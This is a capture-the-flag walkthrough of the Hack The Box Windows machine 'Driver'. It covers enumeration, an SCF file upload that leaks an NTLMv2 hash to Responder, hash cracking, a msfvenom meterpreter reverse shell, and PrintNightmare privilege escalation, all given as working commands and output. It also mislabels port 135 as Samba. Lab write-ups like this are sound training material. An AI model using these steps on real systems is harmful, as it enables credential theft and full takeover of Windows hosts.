Driver

Enumeration

Nmap

First, let's scan for open ports using nmap. We can quickly scan for open ports and store them in a variable: ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.106 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//). Then, we can scan those specific ports in depth by running nmap's built-in scripts: nmap -p$ports -sC -sV 10.10.11.106.
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-19T11:40:18
|_ start_date: 2022-02-19T05:20:32
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s

Port 80

Going to the website on port 80 gives an HTTP authentication dialogue box. Using the credentials admin:admin to sign in works. There is a fw_up.php page where we can upload firmware, but there doesn't seem to be an accessible location where those files get uploaded to.
A directory bruteforce scan reveals nothing: ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.106/FUZZ.

Port 5985 (WinRM)

According to HackTricks, "Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP... If WinRM is enabled on the machine, it's trivial to remotely administer the machine from PowerShell. In fact, you can just drop in to a remote PowerShell session on the machine (as if you were using SSH!)"
Under the WinRM connection in linux heading, HackTricks mentions using Hackplayers/evil-winrm. We need to have access credentials to use this protocol.

Port 135 (Samba)

This leaves one port, 135, which is for samba. According to Wikipedia, "Server Message Block (SMB) is a communication protocol that Microsoft created for providing shared access to files and printers across nodes on a network." Since the other two ports look like dead ends for now, we must be able to find something here. Maybe the files are being uploaded to the samba share, which would mean we have write access to that share without authentication details.
Under this assumption, searching online for "smb unauthenticated write access exploit" reveals this post about SCF file attacks on SMB. Apparently, if SMB "is configured with write permissions for unauthenticated users then it is possible to obtain passwords hashes of domain users or Meterpreter shells."
On the HackTricks post about WinRM there is a subheading called "Pass the hash with evil-winrm." So, if we can get a hash with an SCF attack we can pass the hash and get a user shell with evil-winrm.
Searching for "SMB SCF file exploit" shows these additional results: sql--injection.blogspot.com and 1337red.wordpress.com.
Essentially, an SCF file is used to control Windows Explorer. So, when a user browses to a folder containing an SCF file, Windows will use the contents of that file. We can create an SCF file like this:
[Shell]
Command=2
IconFile=\\X.X.X.X\share\test.ico
[Taskbar]
Command=ToggleDesktop
We can set X.X.X.X to our attacker's ip address. Since the IconFile field is set to a UNC path, Windows will request the icon from the attacker and try authenticating with the user's credentials, then the attack will issue a challenge request, finally Windows will return a challenge response with the NTLM hash.

Foothold

First, we start responder with sudo responder -w --lm -v -I tun0.
Then, we upload the following SCF file using the firmware upload page (fw_up.php) on port 80.
[Shell]
Command=2
IconFile=\\10.10.14.32\share\test.ico
[Taskbar]
Command=ToggleDesktop
Responder outputs the following:
[SMB] NTLMv2 Client : ::ffff:10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:566dd632a8e52118:AA64BDEA4F87F24A42C8CDFA48DF7780:0101000000000000FA685E0C8F25D801E8816037B7647BED00000000020000000000000000000000
We have our NTLM hash!

Cracking the NTLM Hash

We can crack this hash with hashcat. We first find the hashcat mode needed for NTLMv2 hashes with hashcat --help | grep NTLMv2, which shows us the correct mode is 5600.
So, we paste the hash into a file called hash and then run hashcat with hashcat -a 0 -m 5600 hash rockyou.txt:
TONY::DRIVER:566dd632a8e52118:aa64bdea4f87f24a42c8cdfa48df7780:0101000000000000fa685e0c8f25d801e8816037b7647bed00000000020000000000000000000000:liltony
The password is liltony.

Evil WinRM

According to HackTricks, we can use evil-winrm like so: evil-winrm -u <username> -p <password> -i <IP>. Let's connect with the tony user like so: evil-winrm -u tony -p liltony -i 10.10.11.106.
We get a shell on the machine! Now, we can get the user.txt flag with cat ..\Desktop\user.txt.

Privilege Escalation

Let's upload WinPEAS to scan for ways to gain privileges. Since we are using evil-winrm we can simply run the upload command: upload /home/kali/Downloads/winPEASx64.exe. We can run it with .\winPEASx64.exe. This doesn't give any easy wins.
To get a metasploit shell run the following on the attacker:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe > e.exe
sudo msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
options
run
Then, through evil-winrm on the target run: upload e.exe and then .\e.exe.
Then, back in the meterpreter, run background to get mack the the msf console. Then run use post/multi/recon/local_exploit_suggester and set the session with set session 1 then run to get a list of possible exploits. This reveals nothing.
So, the actual exploit that should be used is CVE-2021-1675/CVE-2021-34527, or PrintNightmare. After enough searching one may find this exploit because the spoolsv service is running as shown in WinPEAS's "Current TCP Listening Ports" output (and when simply running ps):
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 80 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 135 0.0.0.0 0 Listening 708 svchost
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49408 0.0.0.0 0 Listening 464 wininit
TCP 0.0.0.0 49409 0.0.0.0 0 Listening 868 svchost
TCP 0.0.0.0 49410 0.0.0.0 0 Listening 844 svchost
TCP 0.0.0.0 49411 0.0.0.0 0 Listening 1176 spoolsv
TCP 0.0.0.0 49412 0.0.0.0 0 Listening 572 services
TCP 0.0.0.0 49413 0.0.0.0 0 Listening 580 lsass
TCP 10.10.11.106 139 0.0.0.0 0 Listening 4 System
TCP 10.10.11.106 445 10.10.14.78 36684 Established 4 System
TCP 10.10.11.106 5985 10.10.14.32 59202 Time Wait 0 Idle
TCP 10.10.11.106 5985 10.10.14.32 59204 Established 4 System
0xdf's article "Playing with PrintNightmare" is a great tutorial on how to exploit this vulnerability. Invoke-Nightmare, a PowerShell script developed by Caleb Stewart and John Hammond, is the most simple to use PrintNightmare exploit.
We can download the exploit to our attacker machine with wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 and then upload it to the target with our evil-winrm connection by running upload CVE-2021-1675.ps1. Then, run set-ExecutionPolicy RemoteSigned -Scope CurrentUser so you don't get the "execution of scripts is disabled on this system" error message (StackOverflow answer where command was found). Now, we can launch the exploit:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -NewUser "john" -NewPassword "SuperSecure"
Originally, I saw the [!] failed to get current driver list error message, but after resetting the box it worked:
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
Now, all we have to do is connect with evil-winrm as our newly created administrator john user: evil-winrm -u john -p SuperSecure -i 10.10.11.106. We can get the root.txt flag with cat C:\Users\Administrator\Desktop\root.txt.
Copy link
Edit on GitHub
On this page
Enumeration
Nmap
Port 80
Port 5985 (WinRM)
Port 135 (Samba)
Foothold
Cracking the NTLM Hash
Evil WinRM
Privilege Escalation